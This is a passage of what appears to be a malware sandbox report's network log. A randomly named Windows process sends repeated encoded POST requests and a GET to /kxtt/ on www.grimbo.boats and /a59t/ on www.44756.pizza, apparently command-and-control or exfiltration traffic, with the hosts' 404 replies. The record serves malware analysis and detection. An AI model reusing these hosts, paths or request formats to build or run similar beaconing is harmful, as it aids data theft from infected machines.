                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 34 39 64 58 4d 78 73 74 73 44 50 4d 76 39 72 30 69 6a 77 69 44 41 62 72 2b 6b 48 4a 49 4e 72 6c 6a 37 61 78 72 39 67 3d
                                                                      Data Ascii: 60q4=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr49dXMxstsDPMv9r0ijwiDAbr+kHJINrlj7axr9g=
                                                                      Jan 13, 2025 15:12:34.037123919 CET1088INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:12:33 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BSUU7A5I%2B8HDLDchLCo2xPdxLeuomz7zeRIWeKiMfFF%2BMIUbi20WDhxrCRf64aCWWRWQDgqQGbKhMJBouR1zVxN%2Bs0YbU%2FDqYBBGhhiJwWWEgx3HK8HOHtKKU71soSUVGvH"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb5f1a4a8c87-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2393&min_rtt=2393&rtt_var=1196&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.849715104.21.18.171801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:35.926218033 CET757OUTPOST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 7a 41 2b 6e 76 2f 4e 36 32 4e 35 59 4b 42 31 71 33 61 6e 70 70 44 6a 71 4f 7a 57 6d 71 58 61 73 4a 59 56 47 6d 5a
                                                                      Data Ascii: 60q4=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAAzA+nv/N62N5YKB1q3anppDjqOzWmqXasJYVGmZ
                                                                      Jan 13, 2025 15:12:36.591033936 CET1079INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:12:36 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBZgsLJXLKEg0j2cqiu70vR9Jn7W5MMZ3N7ISmU1NfOPK3opPolBKVIPg0yqNAVHBhI0zj00DxnJ45h%2BEWFCdclS0Q7paiZWh5rkPHFTgTih79MKj32FVZwrJVinFaRat0eM"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb6f2b014232-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1536&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.849716104.21.18.171801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:38.466509104 CET1774OUTPOST /kxtt/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.grimbo.boats
                                                                      Origin: http://www.grimbo.boats
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.grimbo.boats/kxtt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 41 54 74 69 4e 4b 48 76 43 67 34 61 51 72 49 32 67 7a 62 41 49 44 72 2b 4c 71 31 2b 39 62 4f 6e 39 74 4a 6a 35 71 77 63 56 6a 74 4a 70 46 35 51 77 50 56 45 6c 48 4c 77 71 42 70 33 42 72 4d 39 54 57 73 53 6f 68 4b 66 59 35 59 4c 72 35 2f 59 71 64 48 41 48 63 6f 75 52 61 53 75 79 31 6e 39 37 50 68 74 63 61 56 71 6b 6d 66 35 4e 63 32 72 6f 6d 56 6a 2b 39 44 33 31 76 44 37 53 51 41 32 53 4e 48 37 4a 61 31 70 63 5a 5a 6c 68 30 71 62 61 42 62 37 71 77 52 61 38 53 4f 78 31 50 75 34 32 63 6b 51 [TRUNCATED]
                                                                      Data Ascii: 60q4=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoATtiNKHvCg4aQrI2gzbAIDr+Lq1+9bOn9tJj5qwcVjtJpF5QwPVElHLwqBp3BrM9TWsSohKfY5YLr5/YqdHAHcouRaSuy1n97PhtcaVqkmf5Nc2romVj+9D31vD7SQA2SNH7Ja1pcZZlh0qbaBb7qwRa8SOx1Pu42ckQmKJCk6h3ycOIzLePq1kYUmhhKbuy4x9/9Zv6XPIdh3ZNiF531MKhg1mY6Q1k7w8mix63CJj0ZTCRGlMMbdPU4I2XXDmQdvH+Xs27Y6nteEYd+/tezldM+TnzFKtB2CW4rUy37ZiThnNr5MftE/zwyohmNmEJx7uMT3nxhfyv206oNthV2uGxo8V8G1U07JO8S5oR+ZFkUhHhcpJVUZJ64NbvKc+DOHjfmrJSOI9WEPaVdBXXogql3vFTvGQJEK+D1Et1rsJuHr3Ddql7gjjS4JpCE8HOgo6zoymq9xfC84jRuFaBYJvdg1mxnqlNx32Z7zA+EG54YdlYc+2d7E/jMwV6+SO+JfWkwE9wikbCAqx59p/TIyMWpNGUv4eBWD0mRA0GDyxnFGrgxMnFhAREcdlWYGrTSx2VBOil6D7a/qc8M7W2pR550bOs2ructdt0JPpyb71LNbLAgabhO2aIGfNDNr800pQnIfM6S6FhnkiI/VGZPfb0eyvAogH4U1rCIrokM/jSLzYmjc7nzeYIXcxxAD6L7J6Msd/mmETcOMFlXsjHzjhLDadmd7o33vuk92P2VzJ46p70nhdaEkhxtXU1efoLSg2ze2XDguq6sfPCGnMNq0a+QEADcMUdrQ8WSfrCDfpH6vRm5DfovgicQde8i0i+VMnAqq [TRUNCATED]
                                                                      Jan 13, 2025 15:12:39.118366003 CET1090INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:12:39 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWIim4cKpCgYImUdI7SP2%2BD%2BCxuR3HTeypD9hmDZ6lC0J%2BVs0rClhHwG65e%2FhO5PrRIQmRRraOHnJfQRNSlR41jkSxSHv0pCtmXF1Quooyyu1YRs2vHK0VT1EmqeW4%2F%2Fpcie"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb7eeffa0f5d-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1774&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a
                                                                      Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U
                                                                      Jan 13, 2025 15:12:39.118475914 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.849717104.21.18.171801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:41.008698940 CET482OUTGET /kxtt/?XxGx=INH0eLoh&60q4=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhz8HJcA2kRlIFQIbzI/ZykrVSnU5kYfD/4QtIXIX4MBGxA== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.grimbo.boats
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:12:41.678679943 CET1113INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:12:41 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KK%2FJ7Ij1qP1IG2N7Q%2FHf5Q%2Fc%2BjJhMiJNyqNO%2F6QA0Me2deDq0UsvV6yusfLWwyzThMVN1nDwr9kY%2FHGcdb%2FU%2FppC63oglpjjOjEyjmNNyze%2BS2fHosaqbfj6VJRFHS%2BhTTqy"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fb8efd8d43ee-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1723&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.849718134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:47.765522003 CET734OUTPOST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 70 52 4d 64 79 4d 4e 51 58 34 64 41 69 53 35 6d 2f 4e 72 4d 6d 49 62 6e 6c 6d 4a 59 36 6c 53 58 47 38 75 6a 34 68 67 3d
                                                                      Data Ascii: 60q4=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpRMdyMNQX4dAiS5m/NrMmIbnlmJY6lSXG8uj4hg=
                                                                      Jan 13, 2025 15:12:48.675133944 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:48 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.849719134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:50.308125973 CET754OUTPOST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 7a 4d 6c 6c 68 75 2f 53 50 2f 63 66 2b 54 6d 32 32 33 58 68 78 4d 53 58 37 73 4c 45 54 55 6d 4f 6b 36 31 78 31 6d
                                                                      Data Ascii: 60q4=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlIzMllhu/SP/cf+Tm223XhxMSX7sLETUmOk61x1m
                                                                      Jan 13, 2025 15:12:51.250098944 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:12:51 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.849720134.122.135.48801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:12:52.861541033 CET1771OUTPOST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
